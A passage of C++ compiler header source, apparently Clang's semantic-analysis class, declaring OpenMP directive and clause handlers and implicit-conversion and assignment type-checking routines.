ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type,
bool IsDeclareSimd = false);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The trait info object representing the match clause.
/// \returns None, if the function/variant function are not compatible with
/// the pragma, pair of original function/variant ref expression otherwise.
Optional<std::pair<FunctionDecl *, Expr *>>
checkOpenMPDeclareVariantFunction(DeclGroupPtrTy DG, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which declare variant directive is
/// applied to.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The context traits associated with the function variant.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'detach' clause.
OMPClause *ActOnOpenMPDetachClause(Expr *Evt, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(llvm::omp::DefaultKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'order' clause.
OMPClause *ActOnOpenMPOrderClause(OpenMPOrderClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(OpenMPDependClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acq_rel' clause.
OMPClause *ActOnOpenMPAcqRelClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acquire' clause.
OMPClause *ActOnOpenMPAcquireClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'release' clause.
OMPClause *ActOnOpenMPReleaseClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'relaxed' clause.
OMPClause *ActOnOpenMPRelaxedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'destroy' clause.
OMPClause *ActOnOpenMPDestroyClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *DepModOrTailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation ExtraModifierLoc);
/// Called on well-formed 'inclusive' clause.
OMPClause *ActOnOpenMPInclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'exclusive' clause.
OMPClause *ActOnOpenMPExclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocate' clause.
OMPClause *
ActOnOpenMPAllocateClause(Expr *Allocator, ArrayRef<Expr *> VarList,
SourceLocation StartLoc, SourceLocation ColonLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'private' clause.
OMPClause *ActOnOpenMPPrivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'firstprivate' clause.
OMPClause *ActOnOpenMPFirstprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'lastprivate' clause.
OMPClause *ActOnOpenMPLastprivateClause(
ArrayRef<Expr *> VarList, OpenMPLastprivateModifier LPKind,
SourceLocation LPKindLoc, SourceLocation ColonLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'shared' clause.
OMPClause *ActOnOpenMPSharedClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reduction' clause.
OMPClause *ActOnOpenMPReductionClause(
ArrayRef<Expr *> VarList, OpenMPReductionClauseModifier Modifier,
SourceLocation StartLoc, SourceLocation LParenLoc,
SourceLocation ModifierLoc, SourceLocation ColonLoc,
SourceLocation EndLoc, CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'task_reduction' clause.
OMPClause *ActOnOpenMPTaskReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'in_reduction' clause.
OMPClause *ActOnOpenMPInReductionClause(
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation ColonLoc, SourceLocation EndLoc,
CXXScopeSpec &ReductionIdScopeSpec,
const DeclarationNameInfo &ReductionId,
ArrayRef<Expr *> UnresolvedReductions = llvm::None);
/// Called on well-formed 'linear' clause.
OMPClause *
ActOnOpenMPLinearClause(ArrayRef<Expr *> VarList, Expr *Step,
SourceLocation StartLoc, SourceLocation LParenLoc,
OpenMPLinearClauseKind LinKind, SourceLocation LinLoc,
SourceLocation ColonLoc, SourceLocation EndLoc);
/// Called on well-formed 'aligned' clause.
OMPClause *ActOnOpenMPAlignedClause(ArrayRef<Expr *> VarList,
Expr *Alignment,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyin' clause.
OMPClause *ActOnOpenMPCopyinClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'copyprivate' clause.
OMPClause *ActOnOpenMPCopyprivateClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'flush' pseudo clause.
OMPClause *ActOnOpenMPFlushClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depobj' pseudo clause.
OMPClause *ActOnOpenMPDepobjClause(Expr *Depobj, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'depend' clause.
OMPClause *
ActOnOpenMPDependClause(Expr *DepModifier, OpenMPDependClauseKind DepKind,
SourceLocation DepLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation EndLoc);
/// Called on well-formed 'device' clause.
OMPClause *ActOnOpenMPDeviceClause(OpenMPDeviceClauseModifier Modifier,
Expr *Device, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation ModifierLoc,
SourceLocation EndLoc);
/// Called on well-formed 'map' clause.
OMPClause *
ActOnOpenMPMapClause(ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc,
CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
OpenMPMapClauseKind MapType, bool IsMapTypeImplicit,
SourceLocation MapLoc, SourceLocation ColonLoc,
ArrayRef<Expr *> VarList, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'num_teams' clause.
OMPClause *ActOnOpenMPNumTeamsClause(Expr *NumTeams, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'thread_limit' clause.
OMPClause *ActOnOpenMPThreadLimitClause(Expr *ThreadLimit,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'priority' clause.
OMPClause *ActOnOpenMPPriorityClause(Expr *Priority, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dist_schedule' clause.
OMPClause *ActOnOpenMPDistScheduleClause(
OpenMPDistScheduleClauseKind Kind, Expr *ChunkSize,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation KindLoc,
SourceLocation CommaLoc, SourceLocation EndLoc);
/// Called on well-formed 'defaultmap' clause.
OMPClause *ActOnOpenMPDefaultmapClause(
OpenMPDefaultmapClauseModifier M, OpenMPDefaultmapClauseKind Kind,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation MLoc,
SourceLocation KindLoc, SourceLocation EndLoc);
/// Called on well-formed 'to' clause.
OMPClause *
ActOnOpenMPToClause(ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId,
const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'from' clause.
OMPClause *ActOnOpenMPFromClause(
ArrayRef<Expr *> VarList, CXXScopeSpec &MapperIdScopeSpec,
DeclarationNameInfo &MapperId, const OMPVarListLocTy &Locs,
ArrayRef<Expr *> UnresolvedMappers = llvm::None);
/// Called on well-formed 'use_device_ptr' clause.
OMPClause *ActOnOpenMPUseDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'is_device_ptr' clause.
OMPClause *ActOnOpenMPIsDevicePtrClause(ArrayRef<Expr *> VarList,
const OMPVarListLocTy &Locs);
/// Called on well-formed 'nontemporal' clause.
OMPClause *ActOnOpenMPNontemporalClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Data for list of allocators.
struct UsesAllocatorsData {
/// Allocator.
Expr *Allocator = nullptr;
/// Allocator traits.
Expr *AllocatorTraits = nullptr;
/// Locations of '(' and ')' symbols.
SourceLocation LParenLoc, RParenLoc;
};
/// Called on well-formed 'uses_allocators' clause.
OMPClause *ActOnOpenMPUsesAllocatorClause(SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc,
ArrayRef<UsesAllocatorsData> Data);
/// The kind of conversion being performed.
enum CheckedConversionKind {
/// An implicit conversion.
CCK_ImplicitConversion,
/// A C-style cast.
CCK_CStyleCast,
/// A functional-style cast.
CCK_FunctionalCast,
/// A cast other than a C-style cast.
CCK_OtherCast,
/// A conversion for an operand of a builtin overloaded operator.
CCK_ForBuiltinOverloadedOp
};
static bool isCast(CheckedConversionKind CCK) {
return CCK == CCK_CStyleCast || CCK == CCK_FunctionalCast ||
CCK == CCK_OtherCast;
}
/// ImpCastExprToType - If Expr is not of type 'Type', insert an implicit
/// cast. If there is already an implicit cast, merge into the existing one.
/// If isLvalue, the result of the cast is an lvalue.
ExprResult ImpCastExprToType(Expr *E, QualType Type, CastKind CK,
ExprValueKind VK = VK_RValue,
const CXXCastPath *BasePath = nullptr,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
/// ScalarTypeToBooleanCastKind - Returns the cast kind corresponding
/// to the conversion from scalar type ScalarTy to the Boolean type.
static CastKind ScalarTypeToBooleanCastKind(QualType ScalarTy);
/// IgnoredValueConversions - Given that an expression's result is
/// syntactically ignored, perform any conversions that are
/// required.
ExprResult IgnoredValueConversions(Expr *E);
// UsualUnaryConversions - promotes integers (C99 6.3.1.1p2) and converts
// functions and arrays to their respective pointers (C99 6.3.2.1).
ExprResult UsualUnaryConversions(Expr *E);
/// CallExprUnaryConversions - a special case of an unary conversion
/// performed on a function designator of a call expression.
ExprResult CallExprUnaryConversions(Expr *E);
// DefaultFunctionArrayConversion - converts functions and arrays
// to their respective pointers (C99 6.3.2.1).
ExprResult DefaultFunctionArrayConversion(Expr *E, bool Diagnose = true);
// DefaultFunctionArrayLvalueConversion - converts functions and
// arrays to their respective pointers and performs the
// lvalue-to-rvalue conversion.
ExprResult DefaultFunctionArrayLvalueConversion(Expr *E,
bool Diagnose = true);
// DefaultLvalueConversion - performs lvalue-to-rvalue conversion on
// the operand. This function is a no-op if the operand has a function type
// or an array type.
ExprResult DefaultLvalueConversion(Expr *E);
// DefaultArgumentPromotion (C99 6.5.2.2p6). Used for function calls that
// do not have a prototype. Integer promotions are performed on each
// argument, and arguments that have type float are promoted to double.
ExprResult DefaultArgumentPromotion(Expr *E);
/// If \p E is a prvalue denoting an unmaterialized temporary, materialize
/// it as an xvalue. In C++98, the result will still be a prvalue, because
/// we don't have xvalues there.
ExprResult TemporaryMaterializationConversion(Expr *E);
// Used for emitting the right warning by DefaultVariadicArgumentPromotion
enum VariadicCallType {
VariadicFunction,
VariadicBlock,
VariadicMethod,
VariadicConstructor,
VariadicDoesNotApply
};
VariadicCallType getVariadicCallType(FunctionDecl *FDecl,
const FunctionProtoType *Proto,
Expr *Fn);
// Used for determining in which context a type is allowed to be passed to a
// vararg function.
enum VarArgKind {
VAK_Valid,
VAK_ValidInCXX11,
VAK_Undefined,
VAK_MSVCUndefined,
VAK_Invalid
};
// Determines which VarArgKind fits an expression.
VarArgKind isValidVarArgType(const QualType &Ty);
/// Check to see if the given expression is a valid argument to a variadic
/// function, issuing a diagnostic if not.
void checkVariadicArgument(const Expr *E, VariadicCallType CT);
/// Check to see if a given expression could have '.c_str()' called on it.
bool hasCStrMethod(const Expr *E);
/// GatherArgumentsForCall - Collector argument expressions for various
/// form of call prototypes.
bool GatherArgumentsForCall(SourceLocation CallLoc, FunctionDecl *FDecl,
const FunctionProtoType *Proto,
unsigned FirstParam, ArrayRef<Expr *> Args,
SmallVectorImpl<Expr *> &AllArgs,
VariadicCallType CallType = VariadicDoesNotApply,
bool AllowExplicit = false,
bool IsListInitialization = false);
// DefaultVariadicArgumentPromotion - Like DefaultArgumentPromotion, but
// will create a runtime trap if the resulting type is not a POD type.
ExprResult DefaultVariadicArgumentPromotion(Expr *E, VariadicCallType CT,
FunctionDecl *FDecl);
/// Context in which we're performing a usual arithmetic conversion.
enum ArithConvKind {
/// An arithmetic operation.
ACK_Arithmetic,
/// A bitwise operation.
ACK_BitwiseOp,
/// A comparison.
ACK_Comparison,
/// A conditional (?:) operator.
ACK_Conditional,
/// A compound assignment expression.
ACK_CompAssign,
};
// UsualArithmeticConversions - performs the UsualUnaryConversions on it's
// operands and then handles various conversions that are common to binary
// operators (C99 6.3.1.8). If both operands aren't arithmetic, this
// routine returns the first non-arithmetic type found. The client is
// responsible for emitting appropriate error diagnostics.
QualType UsualArithmeticConversions(ExprResult &LHS, ExprResult &RHS,
SourceLocation Loc, ArithConvKind ACK);
/// AssignConvertType - All of the 'assignment' semantic checks return this
/// enum to indicate whether the assignment was allowed. These checks are
/// done for simple assignments, as well as initialization, return from
/// function, argument passing, etc. The query is phrased in terms of a
/// source and destination type.
enum AssignConvertType {
/// Compatible - the types are compatible according to the standard.
Compatible,
/// PointerToInt - The assignment converts a pointer to an int, which we
/// accept as an extension.
PointerToInt,
/// IntToPointer - The assignment converts an int to a pointer, which we
/// accept as an extension.
IntToPointer,
/// FunctionVoidPointer - The assignment is between a function pointer and
/// void*, which the standard doesn't allow, but we accept as an extension.
FunctionVoidPointer,
/// IncompatiblePointer - The assignment is between two pointers types that
/// are not compatible, but we accept them as an extension.
IncompatiblePointer,
/// IncompatibleFunctionPointer - The assignment is between two function
/// pointers types that are not compatible, but we accept them as an
/// extension.
IncompatibleFunctionPointer,
/// IncompatiblePointerSign - The assignment is between two pointers types
/// which point to integers which have a different sign, but are otherwise
/// identical. This is a subset of the above, but broken out because it's by
/// far the most common case of incompatible pointers.
IncompatiblePointerSign,
/// CompatiblePointerDiscardsQualifiers - The assignment discards
/// c/v/r qualifiers, which we accept as an extension.
CompatiblePointerDiscardsQualifiers,
/// IncompatiblePointerDiscardsQualifiers - The assignment
/// discards qualifiers that we don't permit to be discarded,
/// like address spaces.
IncompatiblePointerDiscardsQualifiers,
/// IncompatibleNestedPointerAddressSpaceMismatch - The assignment
/// changes address spaces in nested pointer types which is not allowed.
/// For instance, converting __private int ** to __generic int ** is
/// illegal even though __private could be converted to __generic.
IncompatibleNestedPointerAddressSpaceMismatch,
/// IncompatibleNestedPointerQualifiers - The assignment is between two
/// nested pointer types, and the qualifiers other than the first two
/// levels differ e.g. char ** -> const char **, but we accept them as an
/// extension.
IncompatibleNestedPointerQualifiers,
/// IncompatibleVectors - The assignment is between two vector types that
/// have the same size, which we accept as an extension.
IncompatibleVectors,
/// IntToBlockPointer - The assignment converts an int to a block
/// pointer. We disallow this.
IntToBlockPointer,
/// IncompatibleBlockPointer - The assignment is between two block
/// pointers types that are not compatible.
IncompatibleBlockPointer,
/// IncompatibleObjCQualifiedId - The assignment is between a qualified
/// id type and something else (that is incompatible with it). For example,
/// "id <XXX>" = "Foo *", where "Foo *" doesn't implement the XXX protocol.
IncompatibleObjCQualifiedId,
/// IncompatibleObjCWeakRef - Assigning a weak-unavailable object to an
/// object with __weak qualifier.
IncompatibleObjCWeakRef,
/// Incompatible - We reject this conversion outright, it is invalid to
/// represent it in the AST.
Incompatible
};
/// DiagnoseAssignmentResult - Emit a diagnostic, if required, for the
/// assignment conversion type specified by ConvTy. This returns true if the
/// conversion was invalid or false if the conversion was accepted.
bool DiagnoseAssignmentResult(AssignConvertType ConvTy,
SourceLocation Loc,
QualType DstType, QualType SrcType,
Expr *SrcExpr, AssignmentAction Action,
bool *Complained = nullptr);
/// IsValueInFlagEnum - Determine if a value is allowed as part of a flag
/// enum. If AllowMask is true, then we also allow the complement of a valid
/// value, to be used as a mask.
bool IsValueInFlagEnum(const EnumDecl *ED, const llvm::APInt &Val,
bool AllowMask) const;
/// DiagnoseAssignmentEnum - Warn if assignment to enum is a constant
/// integer not in the range of enum values.
void DiagnoseAssignmentEnum(QualType DstType, QualType SrcType,
Expr *SrcExpr);
/// CheckAssignmentConstraints - Perform type checking for assignment,
/// argument passing, variable initialization, and function return values.
/// C99 6.5.16.
AssignConvertType CheckAssignmentConstraints(SourceLocation Loc,
QualType LHSType,
QualType RHSType);
/// Check assignment constraints and optionally prepare for a conversion of
/// the RHS to the LHS type. The conversion is prepared for if ConvertRHS
/// is true.
AssignConvertType CheckAssignmentConstraints(QualType LHSType,
ExprResult &RHS,
CastKind &Kind,
bool ConvertRHS = true);
/// Check assignment constraints for an assignment of RHS to LHSType.
///
/// \param LHSType The destination type for the assignment.
/// \param RHS The source expression for the assignment.
/// \param Diagnose If \c true, diagnostics may be produced when checking
/// for assignability. If a diagnostic is produced, \p RHS will be
/// set to ExprError(). Note that this function may still return
/// without producing a diagnostic, even for an invalid assignment.
/// \param DiagnoseCFAudited If \c true, the target is a function parameter
/// in an audited Core Foundation API and does not need to be checked
/// for ARC retain issues.
/// \param ConvertRHS If \c true, \p RHS will be updated to model the
/// conversions necessary to perform the assignment. If \c false,
/// \p Diagnose must also be \c false.
AssignConvertType CheckSingleAssignmentConstraints(
QualType LHSType, ExprResult &RHS, bool Diagnose = true,
bool DiagnoseCFAudited = false, bool ConvertRHS = true);
// If the lhs type is a transparent union, check whether we
// can initialize the transparent union with the given expression.
AssignConvertType CheckTransparentUnionArgumentConstraints(QualType ArgType,
ExprResult &RHS);
bool IsStringLiteralToNonConstPointerConversion(Expr *From, QualType ToType);
bool CheckExceptionSpecCompatibility(Expr *From, QualType ToType);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit = false);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
AssignmentAction Action,
bool AllowExplicit,
ImplicitConversionSequence& ICS);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const ImplicitConversionSequence& ICS,
AssignmentAction Action,
CheckedConversionKind CCK
= CCK_ImplicitConversion);
ExprResult PerformImplicitConversion(Expr *From, QualType ToType,
const StandardConversionSequence& SCS,
AssignmentAction Action,
CheckedConversionKind CCK);
ExprResult PerformQualificationConversion(
Expr *E, QualType Ty, ExprValueKind VK = VK_RValue,
CheckedConversionKind CCK = CCK_ImplicitConversion);
/// the following "Check" methods will return a valid/converted QualType
/// or a null QualType (indicating an error diagnostic was issued).
/// type checking binary operators (subroutines of CreateBuiltinBinOp).
QualType InvalidOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType InvalidLogicalVectorOperands(SourceLocation Loc, ExprResult &LHS,
ExprResult &RHS);
QualType CheckPointerToMemberOperands( // C++ 5.5
ExprResult &LHS, ExprResult &RHS, ExprValueKind &VK,
SourceLocation OpLoc, bool isIndirect);
QualType CheckMultiplyDivideOperands( // C99 6.5.5
ExprResult &LHS, ExprResult &RHS, SourceLocation Loc, bool IsCompAssign,
bool IsDivide);
QualType CheckRemainderOperands( // C99 6.5.5
